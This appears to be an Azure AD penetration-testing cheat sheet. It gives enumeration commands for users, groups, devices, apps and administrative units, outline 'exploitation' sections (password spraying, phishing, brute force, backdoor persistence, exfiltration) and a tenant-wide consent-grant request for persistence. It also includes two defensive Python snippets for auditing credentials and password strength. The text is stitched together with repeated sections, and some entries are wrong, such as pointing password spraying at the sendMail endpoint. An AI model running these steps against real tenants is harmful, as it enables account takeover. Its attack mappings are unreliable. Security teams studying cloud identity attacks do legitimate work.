$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

Devices

# If you know how to do this send a PR!

Azure AD

Enumeration

Users

  1. Enumerate users using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/users?api-version=1.6

  2. Enumerate users using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/users

Groups

  1. Enumerate groups using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/groups?api-version=1.6

  2. Enumerate groups using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/groups

Applications

  1. Enumerate applications using the Azure AD Graph API:

GET https://graph.windows.net/myorganization/applications?api-version=1.6

  2. Enumerate applications using Microsoft Graph API:

GET https://graph.microsoft.com/v1.0/applications

Exploitation

Password Spraying

  1. Perform password spraying attacks against Azure AD:

POST https://login.microsoftonline.com/myorganization/oauth2/token

Phishing

  1. Conduct phishing campaigns targeting Azure AD users.

Brute Force

  1. Perform brute force attacks against Azure AD authentication endpoints.

Post-Exploitation

Token Extraction

  1. Extract tokens from compromised Azure AD accounts.

Persistence

  1. Establish persistence by creating backdoors in Azure AD configurations.

Data Exfiltration

  1. Exfiltrate sensitive data from Azure AD using various techniques.

# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registered users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get devices managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }

If a device (VM) is joined to AzureAD, AzureAD users will be able to log in. Moreover, if the logged-in user is an Owner of the device, they will be a local administrator.

Applications

Apps are App Registrations in the portal (not Enterprise Applications). But each App Registration will create an Enterprise Application (Service Principal) with the same name. Moreover, if the App is a multi-tenant App, another Enterprise Application (Service Principal) will be created in that tenant with the same name.

When an App is generated, 2 types of permissions are granted:

  • Permissions granted to the Service Principal

  • Permissions that the app may have and use on behalf of the user.

# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"

Exploitation

Password Spray Attack

  1. Perform a password spray attack using the Microsoft Graph API:

POST https://graph.microsoft.com/v1.0/users/{user_id}/sendMail

Token Impersonation

  1. Perform token impersonation using the Microsoft Graph API:

POST https://graph.microsoft.com/v1.0/users/{user_id}/sendMail

Persistence

  1. Grant application consent using the Azure AD Graph API:

POST https://graph.windows.net/myorganization/oauth2PermissionGrants?api-version=1.6
```json
{
  "clientId": "{client_id}",
  "consentType": "AllPrincipals",
  "resourceId": "{resource_id}"
}
```

  2. Grant application consent using Microsoft Graph API:

POST https://graph.microsoft.com/v1.0/oauth2PermissionGrants
```json
{
  "clientId": "{client_id}",
  "consentType": "AllPrincipals",
  "resourceId": "{resource_id}"
}
```

# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *

AzureAD

Enumerate AzureAD roles

Get-AzureADDirectoryRole

Enumerate AzureAD users

Get-AzureADUser

Enumerate AzureAD groups

Get-AzureADGroup

Enumerate AzureAD group members

Get-AzureADGroupMember -ObjectId <groupObjectId>

Enumerate AzureAD service principals

Get-AzureADServicePrincipal

Enumerate AzureAD applications

Get-AzureADApplication

Enumerate AzureAD devices

Get-AzureADDevice
# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential

An application with the AppRoleAssignment.ReadWrite permission can escalate to Global Administrator by granting itself the role. For more information check this.

The application password is a secret string that the application uses to prove its identity when requesting a token. Therefore, if you find this password you can access the tenant as the service principal. Note that this password is only visible when it is generated (you could change it, but you cannot retrieve it again). The owner of the application can add a password to it (so they can impersonate it). Sign-ins as these service principals are not marked as risky and they will not have MFA.
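Because sign-ins with an app secret are neither risk-scored nor covered by MFA, the defensive counterpart of the enumeration above is an inventory of every app credential and its lifetime. The following is an added example (not code from HackTricks or Microsoft) that audits the JSON returned by `az ad app list -o json`; it assumes the Microsoft Graph backed output shape (passwordCredentials/keyCredentials with keyId, startDateTime, endDateTime) and the app list embedded below is constructed sample data.

```python
"""Audit app-registration credentials from `az ad app list -o json` output.
Added example, not HackTricks' or Microsoft's code. Assumes each app carries
displayName, appId, passwordCredentials[] and keyCredentials[], and each
credential has keyId plus startDateTime/endDateTime (or the older
startDate/endDate) as ISO-8601 strings. The data below is constructed."""
import json
from datetime import datetime, timedelta, timezone

# Constructed sample output; the GUIDs are placeholders, not a real tenant.
SAMPLE_APP_LIST = json.dumps([
    {"displayName": "hr-sync", "appId": "11111111-1111-1111-1111-111111111111",
     "passwordCredentials": [{"keyId": "k1", "startDateTime": "2020-01-01T00:00:00Z",
                              "endDateTime": "2099-12-31T23:59:59Z"}],
     "keyCredentials": []},
    {"displayName": "reporting", "appId": "22222222-2222-2222-2222-222222222222",
     "passwordCredentials": [],
     "keyCredentials": [{"keyId": "k2", "startDateTime": "2024-01-01T00:00:00Z",
                         "endDateTime": "2024-12-01T00:00:00Z",
                         "type": "AsymmetricX509Cert"}]},
    {"displayName": "no-creds", "appId": "33333333-3333-3333-3333-333333333333",
     "passwordCredentials": [], "keyCredentials": []},
])
# Fixed "now" so the result is reproducible; use datetime.now(timezone.utc) live.
SAMPLE_NOW = datetime(2025, 6, 1, tzinfo=timezone.utc)


def _parse(ts: str) -> datetime:
    # az cli emits a trailing Z, which fromisoformat() only accepts from 3.11 on.
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def audit_app_credentials(app_list_json: str, now: datetime, max_days: int = 365):
    """Return one record per password/certificate credential with its issues.

    A forgotten multi-year secret is the thing to hunt for: whoever holds it
    signs in as the service principal with no MFA and no risk scoring."""
    records = []
    for app in json.loads(app_list_json):
        creds = [("password", c) for c in app.get("passwordCredentials") or []]
        creds += [("certificate", c) for c in app.get("keyCredentials") or []]
        for kind, cred in creds:
            start = _parse(cred.get("startDateTime") or cred["startDate"])
            end = _parse(cred.get("endDateTime") or cred["endDate"])
            issues = []
            if end < now:
                issues.append("expired")
            if end - start > timedelta(days=max_days):
                issues.append(f"lifetime {(end - start).days}d exceeds {max_days}d")
            records.append({"app": app["displayName"], "appId": app["appId"],
                            "kind": kind, "keyId": cred.get("keyId"), "issues": issues})
    return records


def flagged(app_list_json: str, now: datetime):
    """Only the credentials that need attention (stale or long-lived)."""
    return [r for r in audit_app_credentials(app_list_json, now) if r["issues"]]


if __name__ == "__main__":
    for r in flagged(SAMPLE_APP_LIST, SAMPLE_NOW):
        print(f"{r['app']} ({r['kind']} {r['keyId']}): {', '.join(r['issues'])}")
```

Run it against real output with `az ad app list -o json > apps.json` and pass the file contents to `flagged`; pair the result with `az ad app owner list` to find who can mint new secrets for each flagged app.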

Difference between Applications and (Enterprise Applications or Service Principals)

Difference between an application and a Service Principal in Azure:

  • Application/App Registrations: applications that exist in your Azure AD

  • (Get-AzureADApplication -filter "DisplayName eq 'testapp'")

  • Service Principal/Enterprise Applications: security objects in your Azure AD that can have privileges in the Azure Directory and are linked to your application or to a third-party application

  • (Get-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")

  • An administrator may need to approve the granted permissions if they are too sensitive.

An application can live in a third-party tenant, and once you start using it and grant it access, an Enterprise Application/Service Principal is created in your tenant to give it access to the information it needs:

Administrative Units

They are used for better user management.

Administrative units restrict the permissions of a role to any portion of your organization that you define. You could, for example, use administrative units to delegate the Helpdesk Administrator role to regional support specialists, so they can manage users only in the region they support.

Therefore, you can assign roles to the administrative unit and its members will have those roles.

AzureAD

Enumeration

Users

  • List all users:

    • GET https://graph.windows.net/myorganization/users?api-version=1.6

  • Get user by object ID:

    • GET https://graph.windows.net/myorganization/users/{object_id}?api-version=1.6

  • Get user by user principal name:

    • GET https://graph.windows.net/myorganization/users/{user_principal_name}?api-version=1.6

Groups

  • List all groups:

    • GET https://graph.windows.net/myorganization/groups?api-version=1.6

  • Get group by object ID:

    • GET https://graph.windows.net/myorganization/groups/{object_id}?api-version=1.6

  • Get group by display name:

    • GET https://graph.windows.net/myorganization/groups?$filter=displayName eq '{display_name}'&api-version=1.6

Applications

  • List all applications:

    • GET https://graph.windows.net/myorganization/applications?api-version=1.6

  • Get application by object ID:

    • GET https://graph.windows.net/myorganization/applications/{object_id}?api-version=1.6

  • Get application by display name:

    • GET https://graph.windows.net/myorganization/applications?$filter=displayName eq '{display_name}'&api-version=1.6

Exploitation

  • Password Spray Attack:

    • Perform password spray attacks using a list of common passwords against Azure AD accounts to identify weak passwords.

  • Phishing Attacks:

    • Conduct phishing attacks to trick users into revealing their credentials, which can then be used to gain unauthorized access to Azure AD resources.

  • Brute Force Attacks:

    • Launch brute force attacks to guess user passwords and gain unauthorized access to Azure AD accounts.

# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID and role members

Azure AD Identity Protection (AIP)

Azure AD Identity Protection (AIP) is a security service that uses automated detection and remediation to help protect user identities in Azure Active Directory from compromise. AIP continuously monitors and assesses the risk of user sign-ins and identity configurations, automatically applying appropriate security measures such as requiring multi-factor authentication or blocking potentially dangerous activities. This helps organizations prevent identity-based security breaches.

Flow:

  1. Azure AD Identity Protection monitors user activities and collects data on user sign-ins, authentication events and other relevant activities.

  2. The service uses machine learning algorithms to analyze this data and detect potential security threats.

  3. Azure AD Identity Protection assigns a risk level to the threat (for example, a sign-in) and generates an alert, if necessary, so that some automatic action can be taken.

Azure AD Password Protection (APP)

Azure AD Password Protection (APP) is a security feature that helps prevent weak passwords in Azure Active Directory by enforcing strong password policies. APP blocks commonly used weak passwords and their variants, reducing the risk of password-related breaches. It can be applied both at the cloud level and in on-premises Active Directory, improving overall password security across the organization.
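How "variants" of a banned password are caught is the interesting part: Microsoft normalizes the candidate (lowercase, 0/1/$/@ mapped back to o/l/s/a), looks for banned terms as substrings, and scores one point per banned term plus one per remaining character, requiring five points. The following is an added simplified model of that evaluation (not Microsoft's code); the edit-distance-1 fuzzy matching it also performs is omitted, and the banned terms are a constructed sample, not the real global list.

```python
"""Simplified model of how Azure AD Password Protection scores a password.
Added illustration, not Microsoft's code: normalization, banned-term substring
matching and the five-point rule follow Microsoft's public description of the
feature; its additional fuzzy (edit-distance 1) matching is omitted.
The banned terms below are a constructed sample, not the real global list."""

# Constructed sample: a few global-style terms plus a custom (tenant) list.
GLOBAL_BANNED = {"password", "welcome", "qwerty", "summer"}
CUSTOM_BANNED = {"contoso", "blank"}

# Normalization undoes the usual leet-style substitutions before matching.
_SUBSTITUTIONS = str.maketrans({"0": "o", "1": "l", "$": "s", "@": "a"})


def normalize(password: str) -> str:
    """Lowercase the password and map 0/1/$/@ back to o/l/s/a."""
    return password.lower().translate(_SUBSTITUTIONS)


def score_password(password: str, banned=GLOBAL_BANNED | CUSTOM_BANNED):
    """Return (score, matched_terms).

    Every banned term found in the normalized password counts one point and
    the characters it covers count nothing more; each remaining character
    counts one point. Longer terms are matched first so that a long banned
    term is not broken up by a shorter one it happens to contain."""
    norm = normalize(password)
    covered = [False] * len(norm)
    matched = []
    for term in sorted(banned, key=len, reverse=True):
        start = 0
        while (idx := norm.find(term, start)) != -1:
            span = range(idx, idx + len(term))
            if not any(covered[i] for i in span):
                for i in span:
                    covered[i] = True
                matched.append(term)
            start = idx + 1
    return len(matched) + covered.count(False), matched


def is_accepted(password: str, banned=GLOBAL_BANNED | CUSTOM_BANNED) -> bool:
    """A password must reach at least five points to be accepted."""
    return score_password(password, banned)[0] >= 5


if __name__ == "__main__":
    for candidate in ("C0ntos0Blank12", "Password123", "MyP@ssw0rd-Is-Str0ng!"):
        score, terms = score_password(candidate)
        print(f"{candidate!r}: {score} points, banned terms {terms}, "
              f"{'accepted' if is_accepted(candidate) else 'rejected'}")
```

"C0ntos0Blank12" scores only 4 points (contoso + blank + "l2") and is rejected, while "MyP@ssw0rd-Is-Str0ng!" still passes because the characters around the banned "password" carry it past five, which is why the feature is a floor, not a substitute for length and MFA.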
